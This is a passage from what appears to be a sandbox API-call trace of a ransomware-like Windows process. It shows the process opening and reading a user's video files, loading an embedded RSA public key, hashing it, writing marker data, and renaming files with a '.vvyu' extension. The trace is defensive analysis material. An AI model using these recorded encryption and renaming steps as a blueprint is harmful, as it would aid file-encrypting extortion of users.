lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0200.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32c0 [0200.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0200.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3350 [0200.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0200.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0200.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0200.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3320 [0200.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0200.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3308 [0200.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0200.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3368 [0200.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3308 | out: hHeap=0x620000) returned 1 [0200.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3308 [0200.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3320 | out: hHeap=0x620000) returned 1 [0200.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0200.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0200.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0200.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0200.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0200.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32d8 | out: hHeap=0x620000) returned 1 [0200.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea32d8 [0200.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0200.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0200.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3338 | out: hHeap=0x620000) returned 1 [0200.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0200.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3368 | out: hHeap=0x620000) returned 1 [0200.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6f10 [0200.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0200.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0200.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0200.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0200.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32d8 | out: hHeap=0x620000) returned 1 [0200.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea7128 [0200.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0200.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0200.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0200.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0200.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0200.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0200.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0200.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0200.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6f10 | out: hHeap=0x620000) returned 1 [0200.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea7128 | out: hHeap=0x620000) returned 1 [0200.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0200.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0200.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3308 | out: hHeap=0x620000) returned 1 [0200.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0200.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3350 | out: hHeap=0x620000) returned 1 [0200.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0200.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32f0 | out: hHeap=0x620000) returned 1 [0200.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32c0 | out: hHeap=0x620000) returned 1 [0200.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0200.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0200.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0200.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32a8 | out: hHeap=0x620000) returned 1 [0200.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8f8e8 | out: hHeap=0x620000) returned 1 [0200.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0200.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0200.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0200.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0200.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0200.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0200.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0200.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0200.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0200.245] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6a68*, nNumberOfBytesToWrite=0x49c, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea6a68*, lpNumberOfBytesWritten=0x312fb14*=0x49c, lpOverlapped=0x0) returned 1 [0200.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.246] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x4a1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.246] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0200.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0200.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4588 [0200.247] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0200.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0200.247] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0200.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4588 | out: hHeap=0x620000) returned 1 [0200.247] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0200.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0200.248] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0200.248] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0200.248] CloseHandle (hObject=0x510) returned 1 [0200.249] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0200.249] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea6a68 [0200.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0200.250] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\OH6QpPTsq5hUEw3V98y.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\oh6qpptsq5huew3v98y.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\OH6QpPTsq5hUEw3V98y.swf.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\oh6qpptsq5huew3v98y.swf.vvyu")) returned 1 [0200.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0200.252] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0200.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0200.255] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4763a660, ftCreationTime.dwHighDateTime=0x1d8a286, ftLastAccessTime.dwLowDateTime=0x72147ed0, ftLastAccessTime.dwHighDateTime=0x1d8a6ef, ftLastWriteTime.dwLowDateTime=0x72147ed0, ftLastWriteTime.dwHighDateTime=0x1d8a6ef, nFileSizeHigh=0x0, nFileSizeLow=0x14102, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ufb ajK.mkv", cAlternateFileName="UFBAJK~1.MKV")) returned 1 [0200.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x6a53e0 [0200.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.255] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\ufb ajK.mkv") returned=".mkv" [0200.255] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\ufb ajK.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\ufb ajk.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0200.256] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=82178) returned 1 [0200.257] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0200.259] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x140dc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.259] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0200.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0200.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0200.261] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0200.261] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x14102, lpOverlapped=0x0) returned 1 [0200.263] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0200.263] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.263] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.263] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c0e0) returned 1 [0200.264] CryptCreateHash (in: hProv=0x67c0e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0200.264] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0200.264] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0200.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0200.264] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0200.264] GetLastError () returned 0x0 [0200.264] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0200.264] CryptReleaseContext (hProv=0x67c0e0, dwFlags=0x0) returned 1 [0200.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0200.265] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0200.265] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0200.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0200.265] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0200.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0200.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0200.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14100) returned 0x2ea99b0 [0200.266] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0200.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0200.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0200.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0200.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0200.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f8e8 [0200.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32a8 [0200.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f930 [0200.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32c0 [0200.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32f0 [0200.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3350 [0200.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3308 [0200.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0200.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0200.267] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0200.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0200.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32f0 | out: hHeap=0x620000) returned 1 [0200.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3308 | out: hHeap=0x620000) returned 1 [0200.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3350 | out: hHeap=0x620000) returned 1 [0200.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0200.268] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3350 [0200.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0200.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3308 [0200.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0200.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea32f0 [0200.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0200.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0200.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0200.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0200.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0200.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0200.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0200.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0200.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0200.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3308 | out: hHeap=0x620000) returned 1 [0200.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0200.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32f0 | out: hHeap=0x620000) returned 1 [0200.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0200.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0200.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3350 | out: hHeap=0x620000) returned 1 [0200.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0200.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0200.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0200.270] GetCurrentThreadId () returned 0x66c [0200.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0200.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea7ed8 [0200.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0200.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0200.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0200.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0200.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0200.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0200.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.271] GetCurrentThreadId () returned 0x66c [0200.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0200.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0200.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0200.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0200.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccace8 [0200.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0200.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0200.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0200.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3350 [0200.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0200.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0200.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0200.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0200.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0200.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, 